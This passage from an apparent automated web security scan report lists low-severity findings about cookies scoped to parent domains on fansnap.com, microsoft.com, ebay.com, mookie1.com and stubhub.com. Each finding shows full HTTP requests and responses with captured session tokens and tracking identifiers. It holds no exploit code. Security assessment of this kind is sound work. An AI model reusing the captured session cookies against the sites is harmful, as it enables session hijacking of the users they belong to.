Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.14. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Please%20Verify%20your%20Location&fi=1&fv=10.3&ts=1311089274738&sr=1920x1200&bs=1065x723&ms.gsfxversion=7.6.9.0&ms.sup_cid=intercontact&ms.sup_cln=en-us&ms.sup_ct=gp&ms.sup_ln=en-us&ms.sup_sd=gn&MS.LOCALE=en&ms.ssversion=GSS7.0&ms.eventseqno=1 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;select&target=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078474665:ss=1311077969178

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.NumberOfVisits=2&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; domain=microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:49&Microsoft.VisitStartDate=07/19/2011 15:27:49&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Wed, 18-Jul-2012 15:27:49 GMT; path=/
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:57:49 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:27:49 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

13.15. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...

13.16. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=3074&migSource=mig&migAction=minor-category&migRemarks=1 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Sun, 12-Aug-12 18:36:05 GMT; domain=.mookie1.com
Set-Cookie: session=1311100565|1311100565; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.17. http://www.fansnap.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fansnap.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 115
ETag: "d77c6a4a9298bbbbdb807bc3ffe96fee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 41554
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.18. http://www.fansnap.com/developers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fansnap.com
Path:   /developers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 14
ETag: "bfa7ab1f3b81c2b865b63d6a30d3b74a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12059
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.19. http://www.fansnap.com/la/pi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fansnap.com
Path:   /la/pi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/pi?m=_uid%3D526671144%3A256%3Apgswelcome%7C%252F%26_ctx%3D%26_ts%3D1311101015%26_st%3D%26_ma%3D13%26_ref%3D HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: ver=1; vid=256; tvid=1342567440282625; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAZxQ%2BrgY6C29mZnNldGn%2BkJ0%3D--84355d3e3b36e57d4500b80e76814ec0608d1c87; POOLID=B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Content-Disposition: inline; filename="ra.gif"
Content-Transfer-Encoding: binary
Cache-Control: private
X-Runtime: 8
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
Set-Cookie: _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huA59dirgY6C29mZnNldGn%2BkJ0%3D--438f2131decc9bad39c93414732670435648c2b6; domain=fansnap.com; path=/; HttpOnly
Content-Length: 43
Status: 200
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.20. http://www.stubhub.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stubhub.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298 HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:48 GMT
Server: Apache
Set-Cookie: TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 4cb3#816c93/
com-stubhub-dye: 4cb3#816c93/
